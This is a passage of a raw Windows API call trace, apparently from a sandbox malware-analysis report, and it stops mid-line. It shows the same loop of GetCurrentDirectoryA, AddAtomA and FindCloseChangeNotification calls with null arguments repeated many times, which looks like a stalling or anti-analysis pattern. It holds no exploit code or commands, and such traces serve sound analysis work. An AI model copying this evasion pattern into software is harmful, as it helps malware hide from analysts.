GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.280] AddAtomA (lpString=0x0) returned 0x0 [0173.280] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.280] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.280] AddAtomA (lpString=0x0) returned 0x0 [0173.280] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.280] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.280] AddAtomA (lpString=0x0) returned 0x0 [0173.280] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.280] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.280] AddAtomA (lpString=0x0) returned 0x0 [0173.280] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.280] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.281] AddAtomA (lpString=0x0) returned 0x0 [0173.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.281] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.281] AddAtomA (lpString=0x0) returned 0x0 [0173.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.281] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.281] AddAtomA (lpString=0x0) returned 0x0 [0173.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.281] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.281] AddAtomA (lpString=0x0) returned 0x0 [0173.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.281] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.281] AddAtomA (lpString=0x0) returned 0x0 [0173.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.281] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.281] AddAtomA (lpString=0x0) returned 0x0 [0173.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.282] AddAtomA (lpString=0x0) returned 0x0 [0173.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.282] AddAtomA (lpString=0x0) returned 0x0 [0173.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.282] AddAtomA (lpString=0x0) returned 0x0 [0173.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.282] AddAtomA (lpString=0x0) returned 0x0 [0173.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.282] AddAtomA (lpString=0x0) returned 0x0 [0173.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.283] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.284] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.285] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.285] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.285] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.285] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.285] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.285] AddAtomA (lpString=0x0) returned 0x0 [0173.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.286] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.287] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.287] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.287] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.287] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.287] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.287] AddAtomA (lpString=0x0) returned 0x0 [0173.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.288] AddAtomA (lpString=0x0) returned 0x0 [0173.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.288] AddAtomA (lpString=0x0) returned 0x0 [0173.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.288] AddAtomA (lpString=0x0) returned 0x0 [0173.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.288] AddAtomA (lpString=0x0) returned 0x0 [0173.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.288] AddAtomA (lpString=0x0) returned 0x0 [0173.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.289] AddAtomA (lpString=0x0) returned 0x0 [0173.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.290] AddAtomA (lpString=0x0) returned 0x0 [0173.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.291] AddAtomA (lpString=0x0) returned 0x0 [0173.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.292] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.293] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.293] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.293] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.293] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.293] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.293] AddAtomA (lpString=0x0) returned 0x0 [0173.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.294] AddAtomA (lpString=0x0) returned 0x0 [0173.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.294] AddAtomA (lpString=0x0) returned 0x0 [0173.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.294] AddAtomA (lpString=0x0) returned 0x0 [0173.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.294] AddAtomA (lpString=0x0) returned 0x0 [0173.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.294] AddAtomA (lpString=0x0) returned 0x0 [0173.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.294] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.295] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.296] AddAtomA (lpString=0x0) returned 0x0 [0173.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 